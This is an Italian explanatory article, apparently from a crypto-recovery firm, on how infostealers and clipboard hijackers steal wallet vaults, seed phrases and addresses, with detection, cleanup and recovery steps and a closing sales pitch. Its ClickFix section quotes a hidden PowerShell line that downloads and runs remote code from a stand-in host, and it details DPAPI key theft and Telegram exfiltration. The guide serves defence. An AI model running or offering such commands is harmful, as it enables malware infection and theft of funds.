Malware infostealer di criptovalute: come i trojan colpiscono le chiavi private dei wallet, le estensioni del browser e i dati degli appunti — rilevamento, disinfezione e recupero per le vittime
Il malware per il furto di informazioni (infostealer) è emerso come uno dei vettori di minaccia più prolifici e devastanti che affrontano gli investitori di criptovalute, i partecipanti alla finanza decentralizzata e i custodi istituzionali di asset digitali. A differenza del ransomware convenzionale, che crittografa in modo palese i file system per richiedere riscatti estorsivi, i moderni infostealer di criptovalute operano in un silenzio quasi totale. Questi payload trojan armati penetrano le difese degli endpoint, scansionano sistematicamente lo storage su disco locale e la memoria di sistema, estraggono i vault crittografati delle estensioni del browser, sottraggono seed phrase crittografiche e intercettano le destinazioni delle transazioni in tempo reale. Per le vittime che si svegliano con i saldi svuotati su MetaMask, Phantom, Coinbase Wallet o applicazioni desktop, comprendere le modalità con cui si verificano queste violazioni è il primo passo critico per arrestare lo sfruttamento in corso, bonificare l'infrastruttura tecnica e intraprendere azioni forensi decisive per tracciare e recuperare il capitale rubato.
1. Comprendere il malware infostealer di criptovalute: la meccanica del furto di informazioni
Il malware infostealer di criptovalute rappresenta una categoria specializzata di software trojan progettata appositamente per individuare, raccogliere ed esfiltrare segreti di autenticazione, credenziali sensibili e materiale crittografico da sistemi operativi compromessi. Mentre il malware tradizionale si concentrava storicamente su botnet per attacchi Distributed Denial-of-Service (DDoS) o sulla crittografia distruttiva dei file, l'economia del crimine informatico moderno dà priorità all'estrazione silente di asset. Una volta che un payload infostealer viene eseguito su un endpoint, completa la sua missione dannosa in pochi secondi, spesso terminando la propria esecuzione o rimanendo dormiente prima che le soluzioni di sicurezza basate su host possano segnalare attività anomale.
La commercializzazione di questa minaccia è stata alimentata dal modello di distribuzione Malware-as-a-Service (MaaS). Nei forum del dark web e sui canali illeciti di Telegram, sindacati specializzati di sviluppatori concedono in noleggio binari compilati, pannelli di amministrazione web e strumenti di compilazione automatizzati (builder) ad affiliati con scarse competenze tecniche, mediante abbonamenti mensili o accordi di condivisione dei ricavi. Famiglie di malware note come RedLine Stealer, META, Vidar, Raccoon Stealer e Lumma Stealer hanno creato supply chain estremamente sofisticate. Come evidenziato dai ricercatori di sicurezza informatica di SentinelOne, gli operatori di infostealer implementano strategie di distribuzione altamente mirate, come le campagne ClickFix, sfruttando tecniche psicologiche di ingegneria sociale e l'affaticamento da verifica per eseguire script runner che scaricano silenziosamente i binari dei payload da infrastrutture esterne di comando e controllo (C2).
La portata globale di questo ecosistema è stata dimostrata da importanti operazioni internazionali delle forze dell'ordine. Verso la fine del 2024, Eurojust ha coordinato l'Operation Magnus, una coalizione multinazionale che ha visto coinvolte le autorità di Paesi Bassi, Stati Uniti, Belgio, Portogallo, Regno Unito e Australia, riuscendo a smantellare l'infrastruttura server centrale a supporto degli infostealer RedLine e META. I reperti forensi sequestrati durante l'operazione hanno rivelato che queste due sole varianti avevano compromesso milioni di singoli sistemi in tutto il mondo, sottraendo miliardi di credenziali, cronologie e dati di browser e profili di wallet di criptovalute.
Aspetto tecnico chiave: il ciclo di vita operativo di un infostealer
Velocità di esecuzione: Gli stealer moderni come Lumma e Vidar completano la raccolta dei dati, l'aggregazione dei file e l'esfiltrazione di rete in meno di 45 secondi dopo l'iniezione del processo.
Asset presi di mira: I payload individuano automaticamente le chiavi di crittografia master di Chromium, decifrano i database LevelDB delle estensioni, acquisiscono i file di configurazione dei wallet desktop e scansionano le directory utente alla ricerca di pattern mnemonici.
Monetizzazione automatizzata: Gli archivi esfiltrati ("log") vengono elaborati da script di parsing automatizzati che ordinano le credenziali e inviano immediatamente le seed phrase delle criptovalute a bot di drenaggio (drainer) automatizzati.
Secondo il Crypto Crime Report 2026 di Chainalysis, i fondi sottratti originati da violazioni tramite malware e compromissioni di endpoint ammontano a centinaia di milioni di dollari di perdite annuali on-chain. Anziché analizzare manualmente i registri rubati, le moderne reti criminali impiegano parser di log automatizzati che importano archivi compressi esfiltrati tramite richieste crittografate HTTP POST o API Telegram Bot. Quando vengono rilevate chiavi private o seed phrase valide, smart contract drainer automatizzati e bot di transazione svuotano immediatamente tutti i saldi collegati, trasferendo gli asset digitali lungo percorsi di riciclaggio a più salti (multi-hop) entro pochi minuti dall'infezione iniziale.
2. Come gli stealer estraggono chiavi private, vault delle estensioni browser e seed phrase
Le estensioni del browser Web3 non-custodial come MetaMask, Phantom, Coinbase Wallet, Rabby e TronLink si basano sulle API standard di archiviazione del browser. Sia nei browser basati su Chromium (Google Chrome, Brave, Microsoft Edge, Opera) che in quelli basati su Gecko (Mozilla Firefox), lo stato delle estensioni viene salvato in directory su disco locale formattate come database LevelDB o SQLite.
Il meccanismo di decrittografia DPAPI di Windows
I browser Chromium crittografano i dati sensibili archiviati utilizzando una chiave master crittografata presente nel file di configurazione JSON "Local State" del browser. Su Windows, questa chiave master è protetta tramite la funzione CryptProtectData della Data Protection API (DPAPI) di Windows. La DPAPI protegge i segreti da altri account utente presenti sul computer, ma qualsiasi eseguibile in esecuzione nel contesto dell'utente connesso può invocare CryptUnprotectData per decrittografare la chiave master senza attivare avvisi di Controllo dell'account utente (UAC) amministrativo.
Come documentato nell'analisi delle minacce della Huntress Threat Library, infostealer come Lumma Stealer individuano la directory Local State, eseguono CryptUnprotectData sulla chiave master crittografata e ottengono la chiave simmetrica AES non elaborata in memoria. Con questa chiave a disposizione, il malware interroga le directory delle estensioni cercando identificatori statici hardcoded, come quelli di MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) o Phantom (bfnaelmomeimhlpmgjnjophhpkkoljpa). Il malware copia quindi l'intero database LevelDB contenente il vault crittografato del wallet, il salt e l'hash della password.
Punto chiave: attacchi brute-force offline contro i vault del browser
Esfiltrazione del vault: Gli stealer non tentano di indovinare le password del wallet sul tuo endpoint. Trasmettono i database LevelDB crittografati a server esterni dove cluster GPU distribuiti eseguono attacchi a dizionario e di forza bruta a una velocità di miliardi di hash al secondo.
Vulnerabilità della lunghezza della password: Password deboli di 8 caratteri o combinazioni alfanumeriche comuni per le estensioni possono essere violate entro pochi minuti dall'esfiltrazione.
Targeting dei file dei client desktop e seed phrase non crittografate
Gli infostealer prendono di mira anche le applicazioni wallet desktop standalone. La telemetria delle minacce di SlowMist Technology e del Dipartimento di Giustizia degli Stati Uniti (DOJ) rivela che i payload malware interrogano sistematicamente i percorsi di file predefiniti per applicazioni quali Electrum (%APPDATA%\Electrum\wallets), Exodus (%APPDATA%\Exodus\exodus.wallet), Atomic Wallet e Wasabi Wallet.
Gli stealer integrano inoltre moduli di file scraping che scansionano le cartelle Desktop, Documenti e Download alla ricerca di formati di testo e documenti (.txt, .docx, .pdf, .kdbx). I payload utilizzano espressioni regolari (regex) per rilevare seed phrase mnemoniche BIP-39 (composte da 12, 18 o 24 parole standard), chiavi private raw a 64 caratteri e chiavi API degli exchange. Molte varianti catturano anche screenshot del desktop al momento dell'esecuzione per raccogliere credenziali o note visualizzate a schermo.
3. Hijacker degli appunti e malware clipper: la minaccia silenziosa della sostituzione di indirizzi
Gli hijacker degli appunti, o malware clipper, manipolano il buffer degli appunti (clipboard) del sistema operativo in tempo reale. Poiché gli indirizzi pubblici crittografici sono lunghe stringhe alfanumeriche, gli utenti di criptovalute copiano e incollano abitualmente gli indirizzi di destinazione quando avviano un trasferimento. Il malware clipper sovverte questo flusso di lavoro sostituendo silenziosamente l'indirizzo del destinatario desiderato con un indirizzo controllato dall'attaccante.
Monitoraggio delle API e corrispondenza con espressioni regolari
Il malware clipper monitora il buffer degli appunti utilizzando funzioni API di Windows come GetClipboardData e SetClipboardData. Ogni volta che viene copiato del testo, il malware analizza la stringa attraverso espressioni regolari ottimizzate che riconoscono i principali formati di indirizzo di criptovalute:
- Bitcoin (BTC): Formati di indirizzo Legacy P2PKH ("1"), P2SH ("3"), SegWit Bech32 ("bc1q") e Taproot ("bc1p").
- Ethereum e catene EVM (ETH, BNB, MATIC): Stringhe esadecimali di 40 caratteri precedute dal prefisso "0x".
- Solana (SOL): Stringhe codificate in Base58 comprese tra 32 e 44 caratteri alfanumerici.
- TRON (TRX / USDT-TRC20): Stringhe di 34 caratteri che iniziano con "T".
Quando viene rilevato il pattern di un indirizzo, il clipper sostituisce istantaneamente il buffer con un indirizzo di proprietà dell'attaccante sulla medesima rete blockchain in una frazione di millisecondo, rendendo la sostituzione del tutto impercettibile durante le normali operazioni di copia e incolla.
Elusione tramite vanity address e sovversione degli hardware wallet
La ricerca accademica pubblicata su arXiv che descrive l'attacco "EthClipper" dimostra come gli aggressori pre-generino milioni di vanity address (indirizzi personalizzati) che ricalcano i primi 4-6 caratteri iniziali e gli ultimi 4-6 caratteri finali degli indirizzi delle vittime. Poiché l'abitudine visiva umana tende a verificare solo il prefisso e il suffisso di un indirizzo, le vittime confermano regolarmente transazioni a favore di indirizzi fittizi visivamente simili appartenenti all'attaccante.
Rischio critico: gli hardware wallet non sono immuni ai clipper
Integrità della macchina host: Un hardware wallet protegge le chiavi private dall'estrazione, ma non può impedire a un utente di firmare una transazione diretta a un indirizzo destinatario errato.
Verifica a schermo: Se un clipper sostituisce l'indirizzo sul tuo computer, l'hardware wallet visualizzerà l'indirizzo manomesso sul proprio schermo fisico. La mancata ispezione di tutti i caratteri sullo schermo dell'hardware wallet consente ai clipper basati su vanity address di avere successo.
I dati documentati da SlowMist Technology evidenziano come i moduli clipper vengano integrati direttamente nei pacchetti infostealer o distribuiti tramite utility Web3 trojanizzate. Poiché i clipper richiedono pochissime righe di codice, mantengono un'impronta di memoria eccezionalmente leggera ed eludono le firme antivirus statiche, rimanendo attivi sugli endpoint per mesi interi.
4. Vettori di distribuzione dei criminali informatici: malvertising, software pirata ed esche di phishing
I moderni sindacati di infostealer gestiscono reti di distribuzione multicanale progettate per indurre con l'inganno i bersagli a eseguire codice dannoso. Gli investitori di criptovalute, gli sviluppatori Web3 e i trader di asset digitali vengono presi di mira attraverso la manipolazione dei motori di ricerca, l'ingegneria sociale e supply chain digitali compromesse.
Campagne di malvertising sui motori di ricerca
Un vettore di rilievo è lo spoofing degli annunci sui motori di ricerca. L'Internet Crime Complaint Center (IC3) del Federal Bureau of Investigation (FBI) ha emesso un annuncio di servizio pubblico in cui descrive dettagliatamente come i criminali informatici acquistino annunci sponsorizzati su Google Ads e Bing Ads. Gli aggressori fanno offerte su termini di ricerca ad alto intento di conversione come "download metamask", "phantom wallet extension", "tradingview desktop" o "exodus wallet download".
Quando un utente effettua una ricerca, l'annuncio sponsorizzato fraudolento compare sopra i risultati organici. Facendo clic, la vittima viene reindirizzata attraverso filtri di cloaking che mostrano contenuti legittimi ai crawler dei motori di ricerca mentre presentano un clone esatto del progetto legittimo all'utente. Il download del programma di installazione esegue un dropper offuscato contenente RedLine, Vidar o Lumma Stealer.
La tecnica di attacco di verifica ClickFix
Ricerche di sicurezza condotte da SentinelOne e Qualys Threat Research evidenziano la rapida proliferazione dell'attacco di ingegneria sociale denominato "ClickFix". I siti web dannosi visualizzano errori simulati, come falsi controlli CAPTCHA di Cloudflare, avvisi di codec video mancanti o falsi avvisi di aggiornamento del browser.
L'utente viene istruito a premere il tasto Windows + R, incollare una stringa copiata nella finestra Esegui e premere Invio. In realtà, il payload copiato negli appunti contiene un comando PowerShell offuscato (come powershell -w hidden -c "iex(New-Object Net.WebClient).DownloadString('https://malicious-cdn...')"). Poiché è l'utente a eseguire manualmente il comando, i sistemi di protezione degli endpoint lo trattano spesso come un'attività amministrativa legittima, aggirando i firewall perimetrali.
Ripartizione dei vettori di distribuzione: principali fonti di infezione
Annunci sui motori di ricerca: Inserzioni sponsorizzate contraffatte ai primi posti che imitano software per hardware wallet, estensioni Web3 e terminali di trading.
Esche interattive con CAPTCHA: Messaggi ClickFix che ingannano gli utenti inducendoli a eseguire script PowerShell codificati in Base64 nella finestra Esegui di Windows.
Esche di lavoro per sviluppatori: Offerte di lavoro fraudolente su Telegram, Discord e LinkedIn che richiedono ai programmatori di testare repository di codice contenenti dipendenze npm dannose.
Portali di supporto contraffatti e contatti diretti ingannevoli
In un successivo avviso, l'FBI IC3 ha posto in evidenza l'aumento dei portali di supporto tecnico contraffatti e dei contatti fraudolenti verso gli sviluppatori. Nelle community di programmatori di criptovalute, i criminali informatici si spacciano per recruiter o fondatori di startup Web3, invitando i candidati a completare test tecnici di programmazione. I repository forniti contengono dipendenze armate che rilasciano ed eseguono un payload infostealer nel momento stesso in cui viene lanciato il comando npm install.
5. Segnali di allarme: come identificare un'infezione attiva da infostealer sul proprio dispositivo
Gli infostealer sono progettati per agire in modalità stealth, ma la loro esecuzione genera specifici artefatti forensi e anomalie comportamentali. Rilevare un'infezione attiva prima che i criminali informatici completino la monetizzazione dei dati esfiltrati può prevenire la perdita totale degli asset.
Indicatori comportamentali sull'endpoint
Poiché gli infostealer interagiscono direttamente con i file system locali e i processi dei browser, le vittime notano frequentemente improvvise interruzioni operative. Le ricerche della Huntress Threat Library e di Qualys evidenziano diversi indicatori critici sull'endpoint:
- Arresti anomali improvvisi del browser e riavvii del profilo: Gli stealer terminano forzatamente i processi attivi dei browser (come
chrome.exeobrave.exe) per sbloccare i lock sui file di database SQLite e LevelDB. - Finestre di terminale lampeggianti: Brevi finestre della console dei comandi o di PowerShell che compaiono per una frazione di secondo all'avvio del sistema o dopo aver fatto clic su un collegamento web.
- Manomissione delle soluzioni antimalware: Aggiunte non autorizzate nel percorso di registro delle esclusioni di Windows Defender (
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths). - Processi in background insoliti: Eseguibili con nomi casuali in esecuzione da directory temporanee come
%APPDATA%oC:\Users\Public\che consumano cicli di CPU in modo anomalo.
Anomalie nel traffico di rete e nelle comunicazioni
La telemetria pubblicata da Darktrace Threat Insights evidenzia le firme di rete associate all'esfiltrazione da parte degli infostealer. Dopo aver raccolto i file locali, il malware impacchetta password, cookie e chiavi dei wallet in archivi crittografati, avviando richieste HTTP POST in uscita verso server C2 remoti o utilizzando canali API di Telegram Bot (come le richieste indirizzate a api.telegram.org/bot[token]/sendDocument).
Segnali di allarme comportamentali on-chain
Trasferimenti per il pagamento del gas: Gli aggressori depositano piccole quantità di token di gas nativi (ETH, SOL o TRX) nel tuo wallet da indirizzi intermediari sconosciuti per disporre del gas necessario a trasferire saldi di stablecoin più cospicui.
Svuotamento automatico dei saldi: Azzeramento improvviso dei fondi del wallet senza la comparsa di alcuna richiesta di firma nell'estensione del browser.
Routing multi-hop: L'intelligence blockchain di TRM Labs dimostra che le transazioni di drenaggio degli stealer vengono instradate in pochi secondi attraverso exchange decentralizzati o bridge cross-chain.
6. Contenimento di emergenza: isolare i sistemi compromessi e mettere al sicuro gli asset digitali
Se sospetti che un infostealer sia stato eseguito sul tuo computer o noti transazioni non autorizzate, il contenimento immediato è vitale. Il panico porta spesso le vittime a lanciare lunghe scansioni antivirus sulla macchina infetta, il che consente all'esfiltrazione in corso di completarsi o può innescare routine di cancellazione distruttiva (wiper).
Passo 1: Interrompere immediatamente ogni connettività di rete
L'isolamento totale dalla rete è la prima azione obbligatoria. Scollega i cavi Ethernet fisici, disattiva il Wi-Fi e il Bluetooth oppure attiva la modalità aereo tramite interruttore hardware. La disconnessione da Internet interrompe i socket C2 attivi, blocca l'esfiltrazione in sospeso e arresta l'esecuzione remota. Non riavviare immediatamente il computer, poiché la memoria volatile (RAM) contiene dati forensi preziosi.
Passo 2: Passare a un ambiente pulito e isolato
Non tentare mai di salvare gli asset crittografici dal dispositivo infetto. Qualsiasi pressione di tasti o seed phrase digitata su un sistema compromesso può essere intercettata da keylogger attivi. Come sottolineato negli avvisi congiunti di sicurezza informatica dell'FBI IC3, tutte le procedure di risposta agli incidenti devono avvenire da un dispositivo sicuramente pulito:
- Utilizza un computer secondario pulito o uno smartphone appena configurato connesso tramite rete dati cellulare (non il Wi-Fi locale compromesso).
- Configura un hardware wallet completamente nuovo o un nuovo software wallet generato con una recovery phrase del tutto inedita.
- Non importare mai una recovery phrase compromessa: Non importare la seed phrase esistente su un nuovo dispositivo. Una volta che una seed phrase è stata esfiltrata, tutti gli indirizzi pubblici derivati su ogni rete blockchain sono permanentemente insicuri.
Triage pratico: la gerarchia di evacuazione degli asset
Priorità 1: Token liquidi trasferibili: Trasferisci immediatamente i token liquidi di maggior valore (Bitcoin, Ethereum, Solana, USDT, USDC) verso l'indirizzo sicuro di cold storage appena generato.
Priorità 2: Posizioni in staking e bloccate: Esamina i protocolli di finanza decentralizzata in cui sono bloccati i collaterali. Se i periodi di unstaking lo consentono, avvia i prelievi verso indirizzi puliti oppure revoca le concessioni (allowance) dei contratti per bloccare i permessi dei drainer.
Priorità 3: Account sugli exchange centralizzati: Accedi dal dispositivo pulito agli exchange centralizzati (Binance, Coinbase, Kraken). Termina tutte le sessioni esistenti, reimposta le password, rigenera i seed di autenticazione a due fattori (2FA) e disattiva tutte le chiavi API aperte.
Passo 3: Revocare le approvazioni attive e i token di sessione
Se in precedenza erano stati concessi permessi a smart contract dal wallet interessato, utilizza uno strumento di gestione delle autorizzazioni come Revoke.cash o le interfacce ufficiali di approvazione dei block explorer dal tuo dispositivo pulito. Sebbene la revoca delle approvazioni non impedisca a un ladro in possesso della chiave privata raw di trasferire monete native, blocca i contratti drainer automatizzati dal prelevare i token per i quali era stata concessa un'autorizzazione.
7. Disinfezione completa del dispositivo e ricostruzione di un ambiente sicuro
Un errore comune commesso dalle vittime di malware consiste nell'affidarsi a software antivirus commerciali per "ripulire" un sistema infetto. Sebbene uno scanner di endpoint possa rilevare l'eseguibile dropper iniziale, gli infostealer iniettano shellcode in processi di sistema legittimi, modificano le configurazioni di avvio, creano attività pianificate (scheduled task) e rilasciano strumenti di accesso remoto secondari o malware clipper persistenti nelle directory di sistema.
La necessità di una reinstallazione bare-metal del sistema operativo
Come documentato nei report forensi successivi alle azioni delle forze dell'ordine del Dipartimento di Giustizia contro i sindacati di infostealer, i payload stabiliscono frequentemente forme di persistenza profonda. L'analisi delle minacce di Darktrace conferma che gli stealer più avanzati sopravvivono ai semplici punti di ripristino del sistema. Ripristinare l'integrità operativa richiede una reinstallazione completa da zero (bare-metal):
- Creare i supporti di installazione su un dispositivo pulito: Prepara un'unità USB avviabile utilizzando il Media Creation Tool ufficiale di Microsoft o una distribuzione Linux ufficiale da un computer verificato e non compromesso.
- Eseguire una ripartizione e formattazione completa dell'unità: Elimina tutte le partizioni disco esistenti ed esegui una formattazione completa dell'unità. Evita le opzioni di "ripristino leggero" o "mantieni i miei file", poiché i binari dannosi possono annidarsi nelle directory dati utente conservate.
- Aggiornare il firmware UEFI/BIOS della scheda madre: Esegui il flash del firmware più recente scaricato direttamente dal portale del produttore per scongiurare forme di persistenza a livello di firmware.
Invalidazione delle credenziali e distruzione delle sessioni
Poiché gli infostealer sottraggono i cookie di sessione attivi del browser, i criminali informatici aggirano l'autenticazione a più fattori (MFA) tramite il session hijacking. La semplice reinstallazione del sistema operativo non invalida i cookie già trasmessi ai server C2. Da un dispositivo secondario sicuro, invalida manualmente tutte le sessioni attive sui tuoi provider di posta elettronica, password manager, piattaforme cloud ed exchange crypto selezionando l'opzione "Disconnetti da tutte le altre sessioni".
Protocollo di rafforzamento: architettura futura degli endpoint
Endpoint dedicati alle transazioni: I partecipanti attivi al Web3 dovrebbero segregare le proprie attività mantenendo un laptop dedicato e rafforzato (hardened), utilizzato esclusivamente per la firma delle transazioni blockchain.
Verifica fisica su hardware wallet: Mitiga i rischi legati agli appunti dell'host identificati nella ricerca accademica EthClipper verificando ogni singolo carattere dell'indirizzo di destinazione sullo schermo fisico del tuo hardware wallet prima di trasmettere la transazione.
8. Triage degli asset rubati: tracciamento blockchain, segnalazione alle autorità e rimedi legali
Una volta completati il contenimento dell'endpoint e la reimpostazione delle credenziali, la risposta della vittima si sposta sul triage degli asset e sul recupero forense. La natura decentralizzata delle blockchain pubbliche implica che le transazioni non possono essere annullate dagli amministratori del protocollo. Tuttavia, l'architettura a registro trasparente di Bitcoin, Ethereum, Solana e altre reti fornisce una traccia di controllo indelebile che gli investigatori forensi e le forze dell'ordine utilizzano per tracciare i fondi rubati.
Conservazione delle prove forensi
Prima di contattare gli investigatori o presentare denunce ufficiali, compila un fascicolo dettagliato dell'incidente. Registra ogni hash di transazione (TXID) associato ai prelievi non autorizzati, i timestamp di esecuzione, le reti blockchain, gli indirizzi dei destinatari aggressori e gli indirizzi dei contratti dei token. Esporta i metadati JSON grezzi delle transazioni dai block explorer come Etherscan, Solscan o Tronscan. Se ci sono state comunicazioni con un falso recruiter o su un sito web dannoso, archivia le stringhe URL complete, gli indirizzi IP di hosting e le trascrizioni delle chat.
Tracciamento on-chain e analisi multi-hop
I criminali informatici non trattengono le criptovalute rubate nei wallet di raccolta iniziali. Le ricerche di TRM Labs e Chainalysis dimostrano che i sindacati utilizzano script di riciclaggio automatizzati che disperdono rapidamente i fondi su decine di indirizzi intermediari. Gli asset vengono instradati attraverso pool di liquidità decentralizzati, scambiati tramite bridge cross-chain o fatti transitare attraverso protocolli di coin-mixing.
Le società professionali di blockchain intelligence utilizzano motori di analisi basati su grafi per tracciare i flussi finanziari attraverso topologie di riciclaggio complesse. Poiché i sindacati criminali necessitano in ultima analisi di liquidità in valuta fiat, i fondi sottratti finiscono per confluire verso fornitori di servizi per asset virtuali (VASP) centralizzati o broker over-the-counter (OTC). Quando il tracciamento on-chain individua depositi in entrata verso un exchange regolamentato, gli investigatori facilitano un rapido intervento con le forze dell'ordine per presentare istanza ai team di conformità degli exchange e richiedere il congelamento d'emergenza dei conti prima che avvenga l'off-ramping (conversione in valuta fiat).
Rimedi legali e canali di segnalazione alle forze dell'ordine
Segnalazione all'FBI IC3: Le vittime negli Stati Uniti dovrebbero inviare immediatamente un reclamo dettagliato su ic3.gov, classificando l'incidente sotto intrusione informatica e furto di valuta virtuale, includendo tutti gli hash di transazione e gli indirizzi dei wallet degli aggressori.
Autorità internazionali: Le vittime europee dovrebbero presentare denuncia presso le unità di polizia postale e cybercrime nazionali facendo riferimento al quadro operativo dell'Operation Magnus coordinato da Eurojust ed Europol.
Ordini giudiziari di congelamento: Nei casi che comportano perdite finanziarie rilevanti, un consulente legale specializzato nel recupero di asset digitali può ottenere ordini giudiziari di disclosure ex parte (come gli ordini Norwich Pharmacal o Bankers Trust nelle giurisdizioni di common law) per obbligare gli exchange a congelare gli asset rubati e a divulgare i registri di identificazione Know-Your-Customer (KYC).
Sospetti che il tuo wallet di criptovalute sia stato compromesso da un infostealer?
Recoveris è una società di blockchain intelligence e recupero di asset digitali con sede a Zugo, Svizzera. Se le tue chiavi private, seed phrase o vault di estensioni del browser sono stati sottratti da malware, il nostro team forense può valutare il tuo caso, tracciare i flussi on-chain e coordinare il congelamento d'emergenza con gli exchange.
Agisci rapidamente: la finestra temporale per il congelamento d'emergenza sugli exchange è critica prima che i fondi vengano liquidati.
Contatta Recoveris per una valutazione del casoValuta la tua prontezza per il recupero
Quanto sei preparato a rispondere a un'intrusione malware o a un wallet compromesso? Completa la nostra valutazione diagnostica per analizzare la tua capacità di risposta e il potenziale di recupero.
Inizia la valutazione di recupero3-5 minuti • 10 domande • Riepilogo personalizzato istantaneo
Riferimenti
- 1.Chainalysis. (2026). The 2026 Crypto Crime Report & Stolen Funds Ecosystem. Disponibile su: https://www.chainalysis.com/reports/crypto-crime-2026/
- 2.TRM Labs. (2026). Cross-Chain Tracing and Multi-Hop Obfuscation in Cybercrime Investigations. Disponibile su: https://www.trmlabs.com/glossary/cross-chain-tracing
- 3.FBI Internet Crime Complaint Center (IC3). (2022). Cybercriminals Use Search Engine Advertisement Services to Impersonate Legitimate Brands and Deliver Malware. Disponibile su: https://www.ic3.gov/PSA/2022/PSA221221
- 4.Eurojust. (2024). Malware Targeting Millions of People Taken Down by International Coalition (Operation Magnus). Disponibile su: https://www.eurojust.europa.eu/news/malware-targeting-millions-people-taken-down-international-coalition
- 5.U.S. Department of Justice (DOJ). (2024). U.S. Joins International Action Against RedLine and META Infostealers. Disponibile su: https://www.justice.gov/usao-wdtx/pr/us-joins-international-action-against-redline-and-meta-infostealers
- 6.Academic Research (arXiv). (2021). EthClipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion. Disponibile su: https://arxiv.org/abs/2108.14004
- 7.FBI Internet Crime Complaint Center (IC3). (2025). Public Service Announcement on Spoofed Tech Portals and Fraudulent Support Entities. Disponibile su: https://www.ic3.gov/PSA/2025/PSA250919
- 8.SentinelOne. (2025). How ClickFix is Weaponizing Verification Fatigue to Deliver RATs and Infostealers. Disponibile su: https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
- 9.Qualys Threat Research. (2024). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Disponibile su: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
- 10.Huntress Threat Library. (2025). Lumma Stealer Behavioral Profile, Persistence, and Data Exfiltration. Disponibile su: https://www.huntress.com/threat-library/malware/lumma-stealer
- 11.Darktrace Threat Insights. (2025). The Rise of the Lumma Info Stealer and Wallet Harvesting Campaigns. Disponibile su: https://www.darktrace.com/blog/the-rise-of-the-lumma-info-stealer
- 12.SlowMist Technology. (2026). Web3 Wallet Attack Vectors and Malicious Extension Exploits. Disponibile su: https://hacked.slowmist.io/?c=Wallet&page=1
Domande frequenti
Un infostealer può rubare fondi da un hardware wallet come Ledger o Trezor?
Gli infostealer non possono estrarre le chiavi private archiviate in modo sicuro all'interno del secure element di un hardware wallet. Tuttavia, gli hijacker degli appunti possono sostituire silenziosamente gli indirizzi di destinazione durante le transazioni, e falsi avvisi di aggiornamento firmware o software possono ingannare gli utenti inducendoli a digitare le recovery seed direttamente sulla tastiera del computer.
Se l'antivirus ha eliminato il trojan stealer, il mio wallet crypto è sicuro da usare?
No. Gli infostealer completano in genere l'esfiltrazione dei dati entro pochi secondi dall'esecuzione, trasmettendo i vault delle estensioni del browser e le chiavi in cache ai server di comando e controllo prima che le euristiche degli antivirus tradizionali possano attivarsi. Una volta che un dispositivo ha eseguito uno stealer, tutti gli hot wallet residenti devono essere considerati permanentemente compromessi.
Come fanno gli hijacker degli appunti a eludere la verifica visiva dell'indirizzo?
I clipper degli appunti avanzati generano milioni di vanity address di criptovalute che ricalcano i 4-6 caratteri iniziali e i 4-6 caratteri finali dei formati di destinazione più diffusi. Quando gli utenti verificano solo l'inizio e la fine di un indirizzo incollato, confermano inavvertitamente transazioni verso wallet controllati dall'attaccante.
Le criptovalute rubate da operatori di infostealer possono essere recuperate?
Sebbene i trasferimenti blockchain decentralizzati non possano essere annullati, i fondi possono essere tracciati a livello forense attraverso molteplici salti e bridge cross-chain. Quando gli asset rubati raggiungono exchange centralizzati o piattaforme di off-ramp regolamentate, ordini di congelamento legale d'emergenza e il coordinamento con le forze dell'ordine possono bloccare i saldi ai fini del recupero.
Un infostealer può infettare dispositivi macOS o Linux, o vengono presi di mira solo i PC Windows?
Sebbene Windows rappresenti il bersaglio principale a causa della sua ampia quota di mercato desktop e dell'implementazione dello storage DPAPI, i sindacati criminali distribuiscono attivamente stealer multipiattaforma scritti in Go e Rust, oltre a varianti dedicate per macOS come Atomic macOS Stealer (AMOS), che sottraggono le credenziali dal Portachiavi Apple (Keychain) e i vault delle estensioni wallet del browser.